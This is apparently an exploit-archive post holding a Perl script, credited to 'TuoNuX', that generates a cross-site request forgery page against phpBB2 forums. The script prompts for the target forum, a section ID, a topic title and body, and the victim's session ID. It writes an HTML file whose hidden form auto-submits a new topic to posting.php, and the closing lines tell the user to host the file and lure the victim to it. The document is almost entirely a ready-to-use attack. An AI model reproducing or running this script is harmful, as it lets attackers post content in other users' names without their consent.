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phpBB Topic AutoSender

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____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
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[url]Http://www.inj3ct-it.org[/url] Staff[at]inj3ct-it[dot]org


0day Auto Sender Post phpBB2


# Coded by TuoNuX

# Description:

autosendform generator



#0day Auto Sender Post phpBB2
print q {

___ _ _ __ _
|_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2
| || | |/ . \| || | | \ \ * [email]TuoNuX@hotmail.it[/email]
|_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url]
* [url]http://www.hackingz0ne.altervista.org[/url]
0day Auto Sender Post phpBB2

print q {
[+]Insert host site :
[-]Indirizzo: };
$indirizzo = <stdin>;
print q {
[+]Insert the forum path (for example /phpBB/) :
[-]Cartella: };
$cartella = <stdin>;
print q {
[+]Insert ID section ( number after "?f=" ):
[-]ID Sezione: };
$id = <stdin>;
print q {
[+]Insert Topic Title :
[-]Titolo: };
$titolo = <stdin>;
print q {
[+]Insert the body topic :
[+]Yuc can use also the BB code es: [img=urlimmagine]
[-]Testo: };
$testo = <stdin>;
print q {
[+]Insert the victim sid , don't write everyone if there isn't it :
[-]Sid: };
$sid = <stdin>;
$sito = "http://$indirizzo$cartella";
print "\n----------------Riepilogo----------------------\n\n";
print "Forum => $sito\n";
print "ID Section => $id\n";
print "Title => $titolo\n";
print "Message => $testo\n";
print "SID => $sid\n\n";
print "----------------Riepilogo----------------------\n\n";
print "Enter for continued....";
$m1 = q {<html><head><body><form action="};
$m2 = "$sito";
$m3 = q {posting.php" method="post" name="post"><textarea name="message" class="post">};
$m4 = "$testo";
$m5 = q {</textarea><input type="hidden" value="};
$m12 = "\n\nTuoNuX 0day phpBB2 Exploit\n\n\n";
$m6 = "$titolo";
$m7 = q {" class="post" tabindex="2" style="width: 450px;" maxlength="60" size="45" name="subject"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="poll_title"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="add_poll_option_text"/><input type="hidden" value="0" class="post" maxlength="3" size="3" name="poll_length"/><input type="hidden" value="Anteprima" class="mainoption" name="preview" tabindex="5"/><input type="hidden" value="Invia" class="mainoption" name="post" tabindex="6" accesskey="s"/><input type="hidden" name="mode" value="newtopic" /><input type="hidden" name="f" value="};
$m8 = "$id";
$m9 = q {"> <input type="hidden" name="sid" value="};
$m10 = "$sid";
$m11 = q {" /></form><script>document.post.submit()</script></html></head></body>};
$html = "$m1$m2$m3$m4$m12$m5$m6$m7$m8$m9$m10$m11";
open ( FILE , ">phpBB20dayexploit.html" ) || die ( "" );
print FILE $html;
close ( FILE );
print q {
___ _ _ __ _
|_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2
| || | |/ . \| || | | \ \ * [email]TuoNuX@hotmail.it[/email]
|_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url]
* [url]http://www.hackingz0ne.altervista.org[/url]

0day Auto Sender Post phpBB2 Page Saved !!!!...
Work this script on a webspace and you must visit it to victim.
Best ReGaRdS FoR localh0st & hackingz0ne

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